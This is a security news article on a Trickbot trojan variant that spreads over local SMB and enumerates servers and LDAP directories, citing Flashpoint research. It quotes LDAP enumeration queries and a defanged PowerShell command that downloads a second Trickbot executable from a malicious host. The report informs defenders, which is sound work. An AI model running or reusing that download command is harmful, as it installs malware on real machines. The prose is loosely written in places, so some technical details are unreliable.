Categories: Malware

New Version of Trickbot Trojan Spread via Local SMB to Perform NetServer and LDAP Enumeration

A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module  “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB

It performs scanning to find the list of servers using  NetServerEnum Windows API that spread locally via Server Message Block (SMB).

it also has the ability to performing an Enumeration to others computer using  Lightweight Directory Access Protocol (LDAP) enumeration.

Previous SMB Vulnerability Exploit  Major Impact through WannaCry and Petya Ransomware Global Outbreak.

Also Read  Mobile Banking Malware “Svpeng” Working as a Keylogger and Steals Contacts and Call Logs

Trickbot Trojan Execution Flow

Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.

Trickbot TrojanTrickbot Trojan

Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.

Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Trickbot creates 2 queries to perform LDAP Enumeration.

• (objectCategory=computer)
• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.

Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”

Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.

Powershell Script that used to inject to Download another Malware.

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.

Trickbot Malware also learning the methodology of biggest Global outbreak Ransomware Wannacry and Petya and replicate its Functions. Flashpoint said.

Also Read    Mobile Ransomware “LeakerLocker” Found in Play Store Apps that Encrypt and Send Personal Data on a Remote Server

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

CISA Issues New ICS Advisories Addressing Critical Vulnerabilities and Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has issued two new advisories revealing critical vulnerabilities…

27 minutes ago

NVIDIA TensorRT-LLM Vulnerability Let Hackers Run Malicious Code

NVIDIA has issued an urgent security advisory after discovering a significant vulnerability (CVE-2025-23254) in its…

42 minutes ago

CISA Issues Alert on Actively Exploited Apache HTTP Server Escape Vulnerability

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding a newly…

2 hours ago

Disney Hacker Admits Guilt After Stealing 1.1TB of Internal Data

A 25-year-old man from Santa Clarita, California, has agreed to plead guilty to hacking into…

2 hours ago

Managing Shadow IT Risks – CISO’s Practical Toolkit

Managing Shadow IT risks has become a critical challenge for Chief Information Security Officers (CISOs),…

13 hours ago

Application Security In 2025 – CISO’s Priority Guide

Application security in 2025 has become a defining concern for every Chief Information Security Officer…

13 hours ago